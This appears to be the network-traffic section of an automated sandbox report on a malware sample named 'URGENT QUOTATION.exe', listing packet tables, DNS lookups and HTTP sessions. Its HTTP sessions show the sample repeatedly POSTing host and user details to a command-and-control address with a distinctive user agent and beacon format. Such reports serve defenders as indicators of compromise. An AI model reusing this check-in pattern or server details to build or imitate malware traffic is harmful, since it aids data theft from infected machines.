Feb 22, 2021 19:55:27.841558933 CET	80	49748	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:27.841588020 CET	80	49748	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:27.841613054 CET	80	49748	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:27.841635942 CET	80	49748	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:27.841655970 CET	80	49748	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:27.841677904 CET	80	49748	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:27.841698885 CET	80	49748	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:27.841717958 CET	80	49748	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:27.841751099 CET	49748	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:27.841778040 CET	49748	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:27.841804028 CET	49748	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:27.843343973 CET	49748	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:27.845871925 CET	80	49748	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:27.845964909 CET	49748	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:28.011992931 CET	49749	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:28.058187962 CET	80	49749	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:28.058304071 CET	49749	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:28.064709902 CET	49749	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:28.107681990 CET	80	49749	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:28.107758999 CET	49749	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:28.153806925 CET	80	49749	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:28.371942997 CET	80	49749	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:28.371972084 CET	80	49749	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:28.371992111 CET	80	49749	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:28.372010946 CET	80	49749	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:28.372025967 CET	80	49749	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:28.372042894 CET	80	49749	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:28.372057915 CET	80	49749	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:28.372075081 CET	80	49749	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:28.372090101 CET	80	49749	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:28.372155905 CET	49749	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:28.372230053 CET	49749	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:28.373610973 CET	49749	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:28.575431108 CET	49750	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:28.618371010 CET	80	49750	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:28.618521929 CET	49750	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:28.625081062 CET	49750	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:28.668024063 CET	80	49750	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:28.668134928 CET	49750	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:28.713690996 CET	80	49750	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:28.941349030 CET	80	49750	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:28.941373110 CET	80	49750	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:28.941406012 CET	80	49750	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:28.941425085 CET	80	49750	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:28.941446066 CET	80	49750	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:28.941463947 CET	80	49750	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:28.941468954 CET	49750	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:28.941482067 CET	80	49750	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:28.941499949 CET	80	49750	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:28.941504955 CET	49750	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:28.941518068 CET	80	49750	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:28.941534996 CET	49750	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:28.942549944 CET	49750	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:28.992796898 CET	80	49750	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:28.992851973 CET	49750	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:33.082184076 CET	49750	80	192.168.2.4	51.195.53.221

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 22, 2021 19:54:51.186764002 CET	65248	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:54:51.235390902 CET	53	65248	8.8.8.8	192.168.2.4
Feb 22, 2021 19:54:51.295857906 CET	53723	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:54:51.344655037 CET	53	53723	8.8.8.8	192.168.2.4
Feb 22, 2021 19:54:51.574980974 CET	64646	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:54:51.634310007 CET	53	64646	8.8.8.8	192.168.2.4
Feb 22, 2021 19:54:53.045952082 CET	65298	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:54:53.094594002 CET	53	65298	8.8.8.8	192.168.2.4
Feb 22, 2021 19:54:53.826469898 CET	59123	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:54:53.876986027 CET	53	59123	8.8.8.8	192.168.2.4
Feb 22, 2021 19:54:55.059550047 CET	54531	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:54:55.112478971 CET	53	54531	8.8.8.8	192.168.2.4
Feb 22, 2021 19:54:55.857968092 CET	49714	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:54:55.906671047 CET	53	49714	8.8.8.8	192.168.2.4
Feb 22, 2021 19:54:56.128969908 CET	58028	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:54:56.192874908 CET	53	58028	8.8.8.8	192.168.2.4
Feb 22, 2021 19:54:57.182136059 CET	53097	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:54:57.235832930 CET	53	53097	8.8.8.8	192.168.2.4
Feb 22, 2021 19:54:58.715600967 CET	49257	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:54:58.766479969 CET	53	49257	8.8.8.8	192.168.2.4
Feb 22, 2021 19:54:59.609208107 CET	62389	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:54:59.674412012 CET	53	62389	8.8.8.8	192.168.2.4
Feb 22, 2021 19:55:00.696815968 CET	49910	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:55:00.745600939 CET	53	49910	8.8.8.8	192.168.2.4
Feb 22, 2021 19:55:02.166680098 CET	55854	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:55:02.220957994 CET	53	55854	8.8.8.8	192.168.2.4
Feb 22, 2021 19:55:03.526134968 CET	64549	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:55:03.577670097 CET	53	64549	8.8.8.8	192.168.2.4
Feb 22, 2021 19:55:04.919903040 CET	63153	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:55:04.968586922 CET	53	63153	8.8.8.8	192.168.2.4
Feb 22, 2021 19:55:06.442466974 CET	52991	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:55:06.490986109 CET	53	52991	8.8.8.8	192.168.2.4
Feb 22, 2021 19:55:07.767831087 CET	53700	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:55:07.827917099 CET	53	53700	8.8.8.8	192.168.2.4
Feb 22, 2021 19:55:09.457597971 CET	51726	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:55:09.509057045 CET	53	51726	8.8.8.8	192.168.2.4
Feb 22, 2021 19:55:11.120012999 CET	56794	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:55:11.168740988 CET	53	56794	8.8.8.8	192.168.2.4
Feb 22, 2021 19:55:12.421596050 CET	56534	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:55:12.470561981 CET	53	56534	8.8.8.8	192.168.2.4
Feb 22, 2021 19:55:19.234452009 CET	56627	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:55:19.285892010 CET	53	56627	8.8.8.8	192.168.2.4
Feb 22, 2021 19:55:21.189466953 CET	56621	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:55:21.247977972 CET	53	56621	8.8.8.8	192.168.2.4
Feb 22, 2021 19:55:22.609910965 CET	63116	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:55:22.658641100 CET	53	63116	8.8.8.8	192.168.2.4
Feb 22, 2021 19:55:23.245244980 CET	64078	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:55:23.296760082 CET	53	64078	8.8.8.8	192.168.2.4
Feb 22, 2021 19:55:24.076570988 CET	64801	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:55:24.157978058 CET	53	64801	8.8.8.8	192.168.2.4
Feb 22, 2021 19:55:24.391375065 CET	61721	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:55:24.440160036 CET	53	61721	8.8.8.8	192.168.2.4
Feb 22, 2021 19:55:27.253577948 CET	51255	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:55:27.305624008 CET	53	51255	8.8.8.8	192.168.2.4
Feb 22, 2021 19:55:47.101993084 CET	61522	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:55:47.153614998 CET	53	61522	8.8.8.8	192.168.2.4
Feb 22, 2021 19:55:49.834748030 CET	52337	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:55:49.897064924 CET	53	52337	8.8.8.8	192.168.2.4
Feb 22, 2021 19:55:50.541276932 CET	55046	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:55:50.591535091 CET	53	55046	8.8.8.8	192.168.2.4
Feb 22, 2021 19:55:51.153666019 CET	49612	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:55:51.210707903 CET	53	49612	8.8.8.8	192.168.2.4
Feb 22, 2021 19:55:51.619370937 CET	49285	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:55:51.679385900 CET	53	49285	8.8.8.8	192.168.2.4
Feb 22, 2021 19:55:52.129781008 CET	50601	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:55:53.115039110 CET	50601	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:55:54.054042101 CET	53	50601	8.8.8.8	192.168.2.4
Feb 22, 2021 19:55:54.056106091 CET	53	50601	8.8.8.8	192.168.2.4
Feb 22, 2021 19:55:54.095179081 CET	60875	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:55:54.178407907 CET	53	60875	8.8.8.8	192.168.2.4
Feb 22, 2021 19:55:54.567998886 CET	56448	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:55:54.628547907 CET	53	56448	8.8.8.8	192.168.2.4
Feb 22, 2021 19:55:55.194668055 CET	59172	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:55:55.252279043 CET	53	59172	8.8.8.8	192.168.2.4
Feb 22, 2021 19:55:56.154933929 CET	62420	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:55:56.214632034 CET	53	62420	8.8.8.8	192.168.2.4
Feb 22, 2021 19:55:57.027703047 CET	60579	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:55:57.077191114 CET	53	60579	8.8.8.8	192.168.2.4
Feb 22, 2021 19:55:57.698741913 CET	50183	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:55:57.759673119 CET	53	50183	8.8.8.8	192.168.2.4
Feb 22, 2021 19:56:05.495182037 CET	61531	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:56:05.543823004 CET	53	61531	8.8.8.8	192.168.2.4
Feb 22, 2021 19:56:05.694511890 CET	49228	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:56:05.760157108 CET	53	49228	8.8.8.8	192.168.2.4
Feb 22, 2021 19:56:09.793924093 CET	59794	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:56:09.852710962 CET	53	59794	8.8.8.8	192.168.2.4
Feb 22, 2021 19:56:41.472836018 CET	55916	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:56:41.521950960 CET	53	55916	8.8.8.8	192.168.2.4
Feb 22, 2021 19:56:43.412163019 CET	52752	53	192.168.2.4	8.8.8.8
Feb 22, 2021 19:56:43.473107100 CET	53	52752	8.8.8.8	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Feb 22, 2021 19:55:54.056209087 CET	192.168.2.4	8.8.8.8	d0d1	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 22, 2021 19:55:22.609910965 CET	192.168.2.4	8.8.8.8	0xaa9f	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)
Feb 22, 2021 19:55:24.076570988 CET	192.168.2.4	8.8.8.8	0x525f	Standard query (0)	gnpnew.by.files.1drv.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Type	Class
Feb 22, 2021 19:55:22.658641100 CET	8.8.8.8	192.168.2.4	0xaa9f	No error (0)	onedrive.live.com	odc-web-geo.onedrive.akadns.net	CNAME (Canonical name)	IN (0x0001)
Feb 22, 2021 19:55:24.157978058 CET	8.8.8.8	192.168.2.4	0x525f	No error (0)	gnpnew.by.files.1drv.com	by-files.fe.1drv.com	CNAME (Canonical name)	IN (0x0001)
Feb 22, 2021 19:55:24.157978058 CET	8.8.8.8	192.168.2.4	0x525f	No error (0)	by-files.fe.1drv.com	odc-by-files-geo.onedrive.akadns.net	CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

51.195.53.221

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49743	51.195.53.221	80	C:\Users\user\Desktop\URGENT QUOTATION.exe

Timestamp	kBytes transferred	Direction	Data
Feb 22, 2021 19:55:26.030113935 CET	2382	OUT	POST /p.php/594QbwaP456AN HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 51.195.53.221 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 244CE878 Content-Length: 190 Connection: close
Feb 22, 2021 19:55:26.073054075 CET	2382	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 33 00 38 00 35 00 37 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: 'ckav.rujones238576DESKTOP-716T771k08F9C4E9C79A3B52B3F73943052TU1
Feb 22, 2021 19:55:26.303994894 CET	2382	IN	HTTP/1.1 404 Not Found Date: Mon, 22 Feb 2021 18:55:26 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8
Feb 22, 2021 19:55:26.304028034 CET	2384	IN	Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equ
Feb 22, 2021 19:55:26.304047108 CET	2385	IN	Data Raw: 20 23 32 39 33 41 34 41 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 61 20 7b 0d 0a 20 Data Ascii: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFFFF; } .additional-info-items { padding: 20px 0; min-height: 193px; } .contac
Feb 22, 2021 19:55:26.304064035 CET	2386	IN	Data Raw: 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 30 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 61 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f Data Ascii: margin: 60px 0; } footer a { text-decoration: none; } footer a img { border: 0; } .copyright { font-size: 10px; color: #3F4143;
Feb 22, 2021 19:55:26.304080009 CET	2388	IN	Data Raw: 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 0d 0a 20 Data Ascii: } .status-reason { display: inline; } } @media (min-width: 992px) { .additional-info { background-image: url(data:image/png;base64,iVBORw0
Feb 22, 2021 19:55:26.304097891 CET	2389	IN	Data Raw: 49 6b 66 44 74 62 79 43 41 54 67 74 48 42 37 6c 33 54 72 4b 55 47 32 79 57 4f 65 37 4f 32 4b 59 51 49 50 45 37 78 46 44 31 32 59 76 79 36 53 76 71 6f 4c 4f 4d 66 39 35 6b 2b 42 76 67 71 6f 67 43 46 43 78 32 32 4e 64 6c 74 4f 31 65 70 59 63 37 79 Data Ascii: IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP9Npqv0NKZkS7GuNRQig5pvaYQwdTztjRnCrr/l0b2UgO+wRtMiFCAzqpLL0So+hWmi61Nn3aqKGEzDfFrmEoKqcWSFDRONSrAU0iFYLrHU2RKB3q+HxDHT4JKEe2prhxY1aCS5lY+H
Feb 22, 2021 19:55:26.304114103 CET	2390	IN	Data Raw: 66 52 49 75 36 54 66 42 59 4c 51 6e 2f 4a 33 65 43 63 46 64 45 37 69 34 64 77 6d 48 63 6b 57 45 72 4a 73 6d 55 37 65 49 73 47 6e 4c 78 70 56 70 56 45 54 49 34 6b 56 4d 33 56 43 55 77 31 2b 58 64 52 50 52 61 4d 30 6b 36 34 6a 4c 31 4c 45 46 6b 42 Data Ascii: fRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/dZMxVKDkPCyWmbPJ/8uIQJ/XbiL8bNKvv0vWlLCb0fQjR9zuU1y+sSkjcqsgPAzCVGFWzPpYxJM9GAMXhGRinD85xkrCxEomEY7I7j/40IEvjWlJ7wDzjJZtmbCW/cChOPPtlICMGX
Feb 22, 2021 19:55:26.304131985 CET	2392	IN	Data Raw: 4b 48 76 68 43 42 69 35 6a 36 30 42 63 69 38 6f 65 2b 45 4b 45 50 72 59 6d 67 2b 51 4e 4e 4f 77 33 50 64 43 4c 67 70 42 55 52 4f 50 51 31 38 6d 58 31 5a 45 78 38 70 39 2f 2f 49 69 30 71 63 33 51 69 36 43 6d 41 55 31 64 45 70 44 39 53 41 31 74 54 Data Ascii: KHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81kz8fEo5Na0rAQYU8KQEWEPSkAaafnRPiXEGHPCCbcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAA
Feb 22, 2021 19:55:26.304150105 CET	2393	IN	Data Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2d 73 79 73 2f 73 65 72 76 Data Ascii: <li> <img src="/img-sys/server_misconfigured.png" class="info-image" /> <div class="info-heading"> 51.195.53.221/p.php (port 80

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49744	51.195.53.221	80	C:\Users\user\Desktop\URGENT QUOTATION.exe

Timestamp	kBytes transferred	Direction	Data
Feb 22, 2021 19:55:26.532300949 CET	2393	OUT	POST /p.php/594QbwaP456AN HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 51.195.53.221 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 244CE878 Content-Length: 190 Connection: close
Feb 22, 2021 19:55:26.575452089 CET	2394	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 33 00 38 00 35 00 37 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: 'ckav.rujones238576DESKTOP-716T771+08F9C4E9C79A3B52B3F739430eEqdz
Feb 22, 2021 19:55:26.814730883 CET	2394	IN	HTTP/1.1 404 Not Found Date: Mon, 22 Feb 2021 18:55:27 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8
Feb 22, 2021 19:55:26.814758062 CET	2395	IN	Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equ
Feb 22, 2021 19:55:26.814770937 CET	2397	IN	Data Raw: 20 23 32 39 33 41 34 41 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 61 20 7b 0d 0a 20 Data Ascii: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFFFF; } .additional-info-items { padding: 20px 0; min-height: 193px; } .contac
Feb 22, 2021 19:55:26.814786911 CET	2398	IN	Data Raw: 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 30 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 61 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f Data Ascii: margin: 60px 0; } footer a { text-decoration: none; } footer a img { border: 0; } .copyright { font-size: 10px; color: #3F4143;
Feb 22, 2021 19:55:26.814804077 CET	2399	IN	Data Raw: 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 0d 0a 20 Data Ascii: } .status-reason { display: inline; } } @media (min-width: 992px) { .additional-info { background-image: url(data:image/png;base64,iVBORw0
Feb 22, 2021 19:55:26.814821005 CET	2401	IN	Data Raw: 49 6b 66 44 74 62 79 43 41 54 67 74 48 42 37 6c 33 54 72 4b 55 47 32 79 57 4f 65 37 4f 32 4b 59 51 49 50 45 37 78 46 44 31 32 59 76 79 36 53 76 71 6f 4c 4f 4d 66 39 35 6b 2b 42 76 67 71 6f 67 43 46 43 78 32 32 4e 64 6c 74 4f 31 65 70 59 63 37 79 Data Ascii: IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP9Npqv0NKZkS7GuNRQig5pvaYQwdTztjRnCrr/l0b2UgO+wRtMiFCAzqpLL0So+hWmi61Nn3aqKGEzDfFrmEoKqcWSFDRONSrAU0iFYLrHU2RKB3q+HxDHT4JKEe2prhxY1aCS5lY+H
Feb 22, 2021 19:55:26.814836979 CET	2402	IN	Data Raw: 66 52 49 75 36 54 66 42 59 4c 51 6e 2f 4a 33 65 43 63 46 64 45 37 69 34 64 77 6d 48 63 6b 57 45 72 4a 73 6d 55 37 65 49 73 47 6e 4c 78 70 56 70 56 45 54 49 34 6b 56 4d 33 56 43 55 77 31 2b 58 64 52 50 52 61 4d 30 6b 36 34 6a 4c 31 4c 45 46 6b 42 Data Ascii: fRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/dZMxVKDkPCyWmbPJ/8uIQJ/XbiL8bNKvv0vWlLCb0fQjR9zuU1y+sSkjcqsgPAzCVGFWzPpYxJM9GAMXhGRinD85xkrCxEomEY7I7j/40IEvjWlJ7wDzjJZtmbCW/cChOPPtlICMGX
Feb 22, 2021 19:55:26.814857006 CET	2404	IN	Data Raw: 4b 48 76 68 43 42 69 35 6a 36 30 42 63 69 38 6f 65 2b 45 4b 45 50 72 59 6d 67 2b 51 4e 4e 4f 77 33 50 64 43 4c 67 70 42 55 52 4f 50 51 31 38 6d 58 31 5a 45 78 38 70 39 2f 2f 49 69 30 71 63 33 51 69 36 43 6d 41 55 31 64 45 70 44 39 53 41 31 74 54 Data Ascii: KHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81kz8fEo5Na0rAQYU8KQEWEPSkAaafnRPiXEGHPCCbcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAA
Feb 22, 2021 19:55:26.814876080 CET	2404	IN	Data Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2d 73 79 73 2f 73 65 72 76 Data Ascii: <li> <img src="/img-sys/server_misconfigured.png" class="info-image" /> <div class="info-heading"> 51.195.53.221/p.php (port 80

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49745	51.195.53.221	80	C:\Users\user\Desktop\URGENT QUOTATION.exe

Timestamp	kBytes transferred	Direction	Data
Feb 22, 2021 19:55:26.968569040 CET	2405	OUT	POST /p.php/594QbwaP456AN HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 51.195.53.221 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 244CE878 Content-Length: 163 Connection: close
Feb 22, 2021 19:55:27.013936996 CET	2405	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 33 00 38 00 35 00 37 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.rujones238576DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Feb 22, 2021 19:55:27.275238037 CET	2406	IN	HTTP/1.1 404 Not Found Date: Mon, 22 Feb 2021 18:55:27 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8
